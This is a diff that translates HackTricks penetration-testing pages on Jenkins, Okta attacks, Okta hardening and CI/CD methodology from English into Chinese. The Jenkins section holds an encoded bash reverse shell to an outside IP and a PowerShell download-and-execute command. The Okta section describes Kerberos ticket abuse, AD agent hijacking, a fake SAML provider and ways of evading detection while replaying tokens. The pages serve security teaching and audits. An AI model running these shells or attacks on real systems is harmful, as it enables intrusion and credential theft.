@@ -29,9 +26,7 @@ proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
-
-### Reverse shell in linux
-
+### Linux中的反向Shell
```python
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
@@ -39,29 +34,20 @@ proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
+### Windows中的反向Shell
-### Reverse shell in windows
-
-You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
-
+您可以准备一个带有PS反向Shell的HTTP服务器,并使用Jeking下载并执行它:
```python
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc
```
-
### Script
-You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
-
-You can use MSF to get a reverse shell:
+您可以使用[**此脚本**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py)自动化此过程。
+您可以使用 MSF 获取反向 shell:
```
msf> use exploit/multi/http/jenkins_script_console
```
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md
index e682996c2..e871e53b3 100644
--- a/src/pentesting-ci-cd/okta-security/README.md
+++ b/src/pentesting-ci-cd/okta-security/README.md
@@ -2,117 +2,113 @@
{{#include ../../banners/hacktricks-training.md}}
-## Basic Information
+## 基本信息
-[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
+[Okta, Inc.](https://www.okta.com/) 在身份和访问管理领域因其基于云的软件解决方案而受到认可。这些解决方案旨在简化和保护各种现代应用程序的用户身份验证。它们不仅服务于希望保护敏感数据的公司,还服务于希望将身份控制集成到应用程序、网络服务和设备中的开发人员。
-The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
+Okta 的旗舰产品是 **Okta Identity Cloud**。该平台包含一系列产品,包括但不限于:
-- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
-- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
-- **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
-- **Universal Directory**: Enables centralized management of users, groups, and devices.
-- **API Access Management**: Secures and manages access to APIs.
+- **单点登录 (SSO)**:通过允许在多个应用程序中使用一组登录凭据来简化用户访问。
+- **多因素身份验证 (MFA)**:通过要求多种验证形式来增强安全性。
+- **生命周期管理**:自动化用户帐户的创建、更新和停用过程。
+- **通用目录**:实现用户、组和设备的集中管理。
+- **API 访问管理**:保护和管理对 API 的访问。
-These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
+这些服务共同旨在加强数据保护并简化用户访问,提高安全性和便利性。Okta 解决方案的多样性使其成为各个行业的热门选择,适合大型企业、小公司和个人开发者。截至 2021 年 9 月的最后更新,Okta 被认为是身份和访问管理 (IAM) 领域的一个重要实体。
> [!CAUTION]
-> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**.
+> Okta 的主要目标是为不同用户和组配置对外部应用程序的访问。如果您设法在 Okta 环境中 **破坏管理员权限**,您很可能能够 **破坏公司使用的所有其他平台**。
> [!TIP]
-> To perform a security review of an Okta environment you should ask for **administrator read-only access**.
+> 要对 Okta 环境进行安全审查,您应该请求 **管理员只读访问**。
-### Summary
+### 摘要
-There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\
-These users can be inside **groups**.\
-There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)...
+有 **用户**(可以是 **存储在 Okta 中,** 从配置的 **身份提供者** 登录或通过 **Active Directory** 或 LDAP 进行身份验证)。\
+这些用户可以在 **组** 内。\
+还有 **身份验证器**:不同的身份验证选项,如密码和多种 2FA,如 WebAuthn、电子邮件、电话、Okta Verify(它们可以启用或禁用)...
-Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
+然后,有与 Okta 同步的 **应用程序**。每个应用程序将与 Okta 有一些 **映射** 以共享信息(如电子邮件地址、名字等)。此外,每个应用程序必须在 **身份验证策略** 中,指明用户 **访问** 应用程序所需的 **身份验证器**。
> [!CAUTION]
-> The most powerful role is **Super Administrator**.
+> 最强大的角色是 **超级管理员**。
>
-> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**.
+> 如果攻击者以管理员身份破坏 Okta,所有 **信任 Okta 的应用程序** 很可能会 **被破坏**。
-## Attacks
+## 攻击
-### Locating Okta Portal
+### 定位 Okta 门户
-Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**.
+通常公司的门户将位于 **companyname.okta.com**。如果没有,请尝试简单的 **companyname.** 的 **变体**。如果找不到,也可能该组织有一个指向 **Okta 门户** 的 **CNAME** 记录,如 **`okta.companyname.com`**。
-### Login in Okta via Kerberos
+### 通过 Kerberos 登录 Okta
-If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard.
+如果 **`companyname.kerberos.okta.com`** 活跃,**Kerberos 用于 Okta 访问**,通常会绕过 **MFA** 以供 **Windows** 用户使用。要在 AD 中查找 Kerberos 认证的 Okta 用户,请使用 **适当的参数** 运行 **`getST.py`**。在获得 **AD 用户票证** 后,使用 Rubeus 或 Mimikatz 等工具将其 **注入** 到受控主机中,确保 **`clientname.kerberos.okta.com` 在 Internet 选项的 "内部网" 区域**。访问特定 URL 应返回 JSON "OK" 响应,表示 Kerberos 票证被接受,并授予访问 Okta 仪表板的权限。
-Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta.
+破坏 **Okta 服务帐户与委派 SPN 使得银票攻击成为可能**。然而,Okta 使用 **AES** 进行票证加密,需要拥有 AES 密钥或明文密码。使用 **`ticketer.py` 为受害者用户生成票证**,并通过浏览器传递以进行 Okta 身份验证。
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。**
-### Hijacking Okta AD Agent
+### 劫持 Okta AD 代理
-This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key').
+该技术涉及 **访问服务器上的 Okta AD 代理**,该代理 **同步用户并处理身份验证**。通过检查和解密 **`OktaAgentService.exe.config`** 中的配置,特别是使用 **DPAPI** 的 AgentToken,攻击者可以潜在地 **拦截和操纵身份验证数据**。这不仅允许 **监控** 和 **捕获用户凭据** 在 Okta 身份验证过程中的明文,还可以 **响应身份验证尝试**,从而实现未经授权的访问或通过 Okta 提供通用身份验证(类似于“万能钥匙”)。
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。**
-### Hijacking AD As an Admin
+### 作为管理员劫持 AD
-This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment.
+该技术涉及通过首先获取 OAuth 代码来劫持 Okta AD 代理,然后请求 API 令牌。该令牌与 AD 域相关联,并且 **连接器被命名以建立一个假 AD 代理**。初始化允许代理 **处理身份验证尝试**,通过 Okta API 捕获凭据。可用的自动化工具可以简化此过程,提供在 Okta 环境中拦截和处理身份验证数据的无缝方法。
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。**
-### Okta Fake SAML Provider
+### Okta 假 SAML 提供者
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。**
-The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner.
+该技术涉及 **部署一个假 SAML 提供者**。通过使用特权帐户在 Okta 框架中集成外部身份提供者 (IdP),攻击者可以 **控制 IdP,随意批准任何身份验证请求**。该过程包括在 Okta 中设置 SAML 2.0 IdP,操纵 IdP 单点登录 URL 通过本地 hosts 文件进行重定向,生成自签名证书,并配置 Okta 设置以匹配用户名或电子邮件。成功执行这些步骤允许以任何 Okta 用户的身份进行身份验证,绕过对单个用户凭据的需求,显著提高访问控制,可能不会被注意。
-### Phishing Okta Portal with Evilgnix
+### 使用 Evilgnix 针对 Okta 门户的钓鱼
-In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal.
+在 [**这篇博客文章**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) 中解释了如何准备针对 Okta 门户的钓鱼活动。
-### Colleague Impersonation Attack
+### 同事冒充攻击
-The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**.
+每个用户可以拥有和修改的 **属性**(如电子邮件或名字)可以在 Okta 中配置。如果一个 **应用程序** 将用户可以 **修改** 的 **属性** 作为 ID 进行 **信任**,他将能够 **在该平台上冒充其他用户**。
-Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change).
+因此,如果该应用程序信任字段 **`userName`**,您可能无法更改它(因为通常无法更改该字段),但如果它信任例如 **`primaryEmail`**,您可能能够 **将其更改为同事的电子邮件地址** 并冒充它(您需要访问该电子邮件并接受更改)。
-Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\
-Therefore, the app should have this field enabled if it exists:
+请注意,这种冒充取决于每个应用程序的配置。只有信任您修改的字段并接受更新的应用程序将受到影响。\
+因此,如果存在,该应用程序应启用此字段:
-I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently).
+我还见过其他易受攻击的应用程序,但在 Okta 设置中没有该字段(最终不同的应用程序配置不同)。
-The best way to find out if you could impersonate anyone on each app would be to try it!
+找出您是否可以在每个应用程序上冒充任何人的最佳方法是尝试一下!
-## Evading behavioural detection policies
+## 规避行为检测策略
-Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page.
+Okta 中的行为检测策略可能在遇到之前未知,但 **绕过** 它们可以通过 **直接针对 Okta 应用程序** 来实现,避免主要的 Okta 仪表板。使用 **Okta 访问令牌**,在 **特定应用程序的 Okta URL** 上重放令牌,而不是主登录页面。
-Key recommendations include:
+关键建议包括:
-- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
-- Ensure **consistent user-agent strings** between the client and replayed access tokens.
-- **Refrain from replaying** tokens from different users from the same IP address.
-- Exercise caution when replaying tokens against the Okta dashboard.
-- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
+- **避免使用** 流行的匿名代理和 VPN 服务来重放捕获的访问令牌。
+- 确保 **客户端和重放访问令牌之间的一致用户代理字符串**。
+- **避免从同一 IP 地址重放** 来自不同用户的令牌。
+- 在重放令牌时对 Okta 仪表板要小心。
+- 如果知道受害公司 IP 地址,**限制流量** 到这些 IP 或其范围,阻止所有其他流量。
-## Okta Hardening
+## Okta 加固
-Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible:
+Okta 有很多可能的配置,在此页面中您将找到如何审查它们以确保尽可能安全:
{{#ref}}
okta-hardening.md
{{#endref}}
-## References
+## 参考
- [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers)
- [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/okta-security/okta-hardening.md b/src/pentesting-ci-cd/okta-security/okta-hardening.md
index a7dac96a7..3bf460d60 100644
--- a/src/pentesting-ci-cd/okta-security/okta-hardening.md
+++ b/src/pentesting-ci-cd/okta-security/okta-hardening.md
@@ -2,202 +2,198 @@
{{#include ../../banners/hacktricks-training.md}}
-## Directory
+## 目录
-### People
+### 人员
-From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs).
+从攻击者的角度来看,这非常有趣,因为您将能够看到**所有注册的用户**、他们的**电子邮件**地址、他们所属的**组**、**个人资料**,甚至**设备**(手机及其操作系统)。
-For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**".
+对于白盒审查,请检查是否没有多个“**待处理用户操作**”和“**密码重置**”。
-### Groups
+### 组
-This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\
-It's possible to see the **people included inside groups** and **apps assigned** to each group.
+这是您可以找到在 Okta 中创建的所有组的地方。了解不同的组(**权限**集合)可能授予**用户**的权限是很有趣的。\
+可以查看**包含在组中的人员**和**分配给每个组的应用程序**。
-Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members.
+当然,任何名为**admin**的组都很有趣,特别是**全球管理员**组,检查成员以了解谁是特权成员。
-From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3).
+从白盒审查来看,**全球管理员不应超过 5 个**(最好只有 2 或 3 个)。
-### Devices
+### 设备
-Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not.
+在这里找到**所有用户的设备列表**。您还可以查看它是否被**主动管理**。
-### Profile Editor
+### 个人资料编辑器
-Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**.
+在这里可以观察到关键的个人信息,如名字、姓氏、电子邮件、用户名等是如何在 Okta 和其他应用程序之间共享的。这很有趣,因为如果用户可以在 Okta 中**修改某个字段**(例如他的名字或电子邮件),而该字段又被**外部应用程序**用来**识别**用户,那么内部人员可能会尝试**接管其他账户**。
-Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it).
+此外,在 Okta 的个人资料**`用户(默认)`**中,您可以看到**每个用户**具有的**字段**以及哪些字段是**可写**的。如果您无法看到管理面板,只需转到**更新您的个人资料**信息,您将看到可以更新的字段(请注意,要更新电子邮件地址,您需要验证它)。
-### Directory Integrations
+### 目录集成
-Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories.
+目录允许您从现有来源导入人员。我想在这里您将看到从其他目录导入的用户。
-I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**.
+我没有看到它,但我想这很有趣,可以找出**Okta 用于导入用户的其他目录**,因此如果您**妥协该目录**,您可以在 Okta 中创建的用户中设置一些属性值,并**可能妥协 Okta 环境**。
-### Profile Sources
+### 个人资料来源
-A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time.
+个人资料来源是**作为用户个人资料属性的真实来源的应用程序**。用户一次只能由一个应用程序或目录提供。
-I haven't seen it, so any information about security and hacking regarding this option is appreciated.
+我没有看到它,因此关于此选项的安全性和黑客攻击的任何信息都很受欢迎。
-## Customizations
+## 自定义
-### Brands
+### 品牌
-Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know).
+在此部分的**域**选项卡中检查用于发送电子邮件的电子邮件地址和公司在 Okta 中的自定义域(您可能已经知道)。
-Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL.
+此外,在**设置**选项卡中,如果您是管理员,您可以“**使用自定义注销页面**”并设置自定义 URL。
-### SMS
+### 短信
-Nothing interesting here.
+这里没有什么有趣的内容。
-### End-User Dashboard
+### 最终用户仪表板
-You can find here applications configured, but we will see the details of those later in a different section.
+您可以在这里找到配置的应用程序,但我们将在不同的部分稍后查看这些详细信息。
-### Other
+### 其他
-Interesting setting, but nothing super interesting from a security point of view.
+有趣的设置,但从安全的角度来看没有什么特别有趣的内容。
-## Applications
+## 应用程序
-### Applications
+### 应用程序
-Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application...
+在这里,您可以找到所有**配置的应用程序**及其详细信息:谁可以访问它们,如何配置(SAML、OpenID)、登录 URL、Okta 和应用程序之间的映射...
-In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots:
+在**`登录`**选项卡中,还有一个名为**`密码显示`**的字段,允许用户在检查应用程序设置时**显示他的密码**。要从用户面板检查应用程序的设置,请单击 3 个点:
-And you could see some more details about the app (like the password reveal feature, if it's enabled):
+您可以看到有关该应用程序的更多详细信息(例如密码显示功能是否启用):
-## Identity Governance
+## 身份治理
-### Access Certifications
+### 访问认证
-Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required.
+使用访问认证创建审计活动,以定期审查用户对资源的访问,并在需要时自动批准或撤销访问。
-I haven't seen it used, but I guess that from a defensive point of view it's a nice feature.
+我没有看到它被使用,但我想从防御的角度来看,这是一个不错的功能。
-## Security
+## 安全
-### General
+### 一般
-- **Security notification emails**: All should be enabled.
-- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
-- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
-- **User enumeration prevention**: Both should be enabled
- - Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
- - Self-Service Registration
- - JIT flows with email authentication
-- **Okta ThreatInsight settings**: Log and enforce security based on threat level
+- **安全通知电子邮件**:所有应启用。
+- **CAPTCHA 集成**:建议至少设置不可见的 reCaptcha。
+- **组织安全**:所有内容都可以启用,激活电子邮件不应持续太长时间(7 天是可以的)。
+- **用户枚举防止**:两者都应启用。
+- 请注意,如果允许以下任一条件,则用户枚举防止将无效(有关更多信息,请参见 [用户管理](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm)):
+- 自助注册
+- 带电子邮件身份验证的 JIT 流程
+- **Okta ThreatInsight 设置**:根据威胁级别记录和执行安全性。
### HealthInsight
-Here is possible to find correctly and **dangerous** configured **settings**.
+在这里可以找到正确和**危险**配置的**设置**。
-### Authenticators
+### 认证器
-Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong.
+在这里,您可以找到用户可以使用的所有身份验证方法:密码、电话、电子邮件、代码、WebAuthn... 单击密码认证器,您可以查看**密码策略**。请检查它是否强大。
-In the **Enrollment** tab you can see how the ones that are required or optinal:
+在**注册**选项卡中,您可以看到哪些是必需的或可选的:
-It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn.
+建议禁用电话。最强的组合可能是密码、电子邮件和 WebAuthn 的组合。
-### Authentication policies
+### 身份验证策略
-Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions.
+每个应用程序都有一个身份验证策略。身份验证策略验证尝试登录应用程序的用户是否满足特定条件,并根据这些条件强制执行因素要求。
-Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it.
+在这里,您可以找到**访问每个应用程序的要求**。建议每个应用程序至少请求密码和另一种方法。但是,如果作为攻击者您发现某些东西更弱,您可能能够攻击它。
-### Global Session Policy
+### 全局会话策略
-Here you can find the session policies assigned to different groups. For example:
+在这里,您可以找到分配给不同组的会话策略。例如:
-It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location.
+建议请求 MFA,将会话生命周期限制为几个小时,不要在浏览器扩展中持久化会话 cookie,并限制位置和身份提供者(如果可能的话)。例如,如果每个用户应该从一个国家登录,您可以只允许该位置。
-### Identity Providers
+### 身份提供者
-Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card.
+身份提供者(IdP)是**管理用户账户**的服务。在 Okta 中添加 IdP 使您的最终用户能够通过首先使用社交账户或智能卡进行身份验证来**自助注册**您的自定义应用程序。
-On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain.
+在身份提供者页面上,您可以添加社交登录(IdP)并通过添加入站 SAML 将 Okta 配置为服务提供者(SP)。添加 IdP 后,您可以设置路由规则,根据上下文(例如用户的位置、设备或电子邮件域)将用户定向到 IdP。
-**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment.
+**如果配置了任何身份提供者**,从攻击者和防御者的角度检查该配置,并**确保来源确实可信**,因为攻击者妥协它也可能获得对 Okta 环境的访问。
-### Delegated Authentication
+### 委派身份验证
-Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server.
+委派身份验证允许用户通过输入其组织的**Active Directory (AD) 或 LDAP** 服务器的凭据登录 Okta。
-Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting.
+再次检查这一点,因为攻击者妥协组织的 AD 可能能够通过此设置转向 Okta。
-### Network
+### 网络
-A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations.
+网络区域是一个可配置的边界,您可以使用它来**授予或限制对您组织中计算机和设备的访问**,基于请求访问的**IP 地址**。您可以通过指定一个或多个单独的 IP 地址、IP 地址范围或地理位置来定义网络区域。
-After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**.
+定义一个或多个网络区域后,您可以在全局会话策略、身份验证策略、VPN 通知和路由规则中**使用它们**。
-From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly.
+从攻击者的角度来看,了解允许哪些 IP 是有趣的(并检查是否有任何**IP 比其他 IP 更特权**)。从攻击者的角度来看,如果用户应该从特定的 IP 地址或区域访问,请检查此功能是否正确使用。
-### Device Integrations
+### 设备集成
-- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
- - I haven't seen this used yet. TODO
-- **Notification services**: I haven't seen this used yet. TODO
+- **端点管理**:端点管理是可以应用于身份验证策略的条件,以确保受管理的设备可以访问应用程序。
+- 我还没有看到这被使用。待办事项
+- **通知服务**:我还没有看到这被使用。待办事项
### API
-You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**.
+您可以在此页面创建 Okta API 令牌,并查看已**创建**的令牌、它们的**权限**、**过期**时间和**来源 URL**。请注意,API 令牌是使用创建令牌的用户的权限生成的,仅在创建它们的**用户**处于**活动**状态时有效。
-The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API.
+**受信任的来源**授予您控制和信任的网站访问您的 Okta 组织,通过 Okta API。
-There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them.
+不应有很多 API 令牌,因为如果有,攻击者可能会尝试访问它们并使用它们。
-## Workflow
+## 工作流
-### Automations
+### 自动化
-Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users.
+自动化允许您创建基于在最终用户生命周期中发生的一组触发条件运行的自动化操作。
-For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta".
+例如,一个条件可以是“Okta 中的用户不活动”或“Okta 中的用户密码过期”,而操作可以是“向用户发送电子邮件”或“在 Okta 中更改用户生命周期状态”。
-## Reports
+## 报告
-### Reports
+### 报告
-Download logs. They are **sent** to the **email address** of the current account.
+下载日志。它们被**发送**到当前账户的**电子邮件地址**。
-### System Log
+### 系统日志
-Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta.
+在这里,您可以找到**用户执行的操作日志**,包含许多详细信息,如在 Okta 或通过 Okta 登录应用程序。
-### Import Monitoring
+### 导入监控
-This can **import logs from the other platforms** accessed with Okta.
+这可以**从其他平台导入日志**,通过 Okta 访问。
-### Rate limits
+### 速率限制
-Check the API rate limits reached.
+检查达到的 API 速率限制。
-## Settings
+## 设置
-### Account
+### 账户
-Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates.
+在这里,您可以找到有关 Okta 环境的**通用信息**,例如公司名称、地址、**电子邮件账单联系人**、**电子邮件技术联系人**,以及谁应该接收 Okta 更新和哪种类型的 Okta 更新。
-### Downloads
+### 下载
-Here you can download Okta agents to sync Okta with other technologies.
+在这里,您可以下载 Okta 代理,以将 Okta 与其他技术同步。
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
index 41899af04..5a8daf2cc 100644
--- a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
+++ b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
@@ -6,103 +6,99 @@
## VCS
-VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**:
+VCS 代表 **版本控制系统**,该系统允许开发人员 **管理他们的源代码**。最常见的是 **git**,您通常会发现公司在以下 **平台** 中使用它:
- Github
- Gitlab
- Bitbucket
- Gitea
-- Cloud providers (they offer their own VCS platforms)
+- 云提供商(他们提供自己的 VCS 平台)
## CI/CD Pipelines
-CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production.
+CI/CD 管道使开发人员能够 **自动执行代码**,用于构建、测试和部署应用程序等各种目的。这些自动化工作流是通过 **特定操作** 触发的,例如代码推送、拉取请求或计划任务。它们有助于简化从开发到生产的过程。
-However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**.
+然而,这些系统需要在某个地方 **执行**,通常需要 **特权凭据来部署代码或访问敏感信息**。
## VCS Pentesting Methodology
> [!NOTE]
-> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code.
